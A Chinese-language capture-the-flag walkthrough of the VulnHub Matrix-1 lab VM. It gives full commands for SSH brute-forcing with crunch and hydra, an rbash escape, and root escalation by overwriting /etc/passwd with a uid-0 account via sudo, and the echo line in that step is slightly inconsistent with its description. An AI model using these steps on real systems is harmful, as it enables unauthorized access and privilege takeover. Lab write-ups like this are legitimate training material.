環境
Kali: 192.168.132.131
靶機:192.168.132.152 靶機地址:http://www.vulnhub.com/entry/matrix-1,259/
一、資訊收集
arp-scan -l

nmap -p- -sC -sV 192.168.132.152

http://192.168.132.152:80/

查看源代碼,發現一張圖片

檔案名為:p0rt_31337.png 發現31337埠有關

http://192.168.132.152:31337/

二、漏洞探測
查看源代碼,查看加密內容,看密文可能是base64加密

解密,發現該網站下存在Cypher.matrix檔案

訪問并下載檔案,用記事本打開
http://192.168.132.152:31337/Cypher.matrix

看密文為Brainfuck加密,進行解密

三、漏洞驗證
查看密碼庫
cat /usr/share/crunch/charset.lst

制作密碼字典
crunch 8 8 -f /usr/share/crunch/charset.lst lalpha-numeric -t k1ll0r@@ > password.dict

進行暴力破解ssh
hydra -l guest -P password.dict ssh://192.168.132.152:22 -I -f -V

四、提權
由于bash shell功能受限,需要繞過
參考文章 https://www.freebuf.com/articles/system/188989.html
嘗試可使用的命令

嘗試重新登錄ssh,進行繞過rbash

成功繞過
ssh [email protected] -t "bash --noprofile"

查看可sudo的命令
sudo -l

生成密文
openssl passwd -1 -salt hack hack123

將/etc/passwd復制出來
sudo cp /etc/passwd passwd
將生成密文追加到passwd檔案中
echo 'hack:1hack$WTn0dk2QjNeKfl.DHOUue0:0:0::/root:/bin/bash' > passwd
將passwd復制到/etc/覆寫原passwd檔案
sudo cp passwd /etc/passwd
su - hack

尋找flag嗎,并查看
cat flag.txt

五、總結
掃描埠發現web服務器,查看源代碼發現31337埠,訪問并查看源代碼發現Cypher.matrix目錄,進行Brainfuck解密,獲得殘缺的密碼,使用crunch工具生成密碼字典,破解ssh密碼,bash shell功能受限,需要繞過rbash,利用sudo進行提權,獲得root權限,
轉載請註明出處,本文鏈接:https://www.uj5u.com/qita/303185.html
標籤:其他
上一篇:京東京豆呆瓜,青龍面板+Ninja-依賴全方面教程【全網最新最全】
下一篇:VulnHub-DC-4
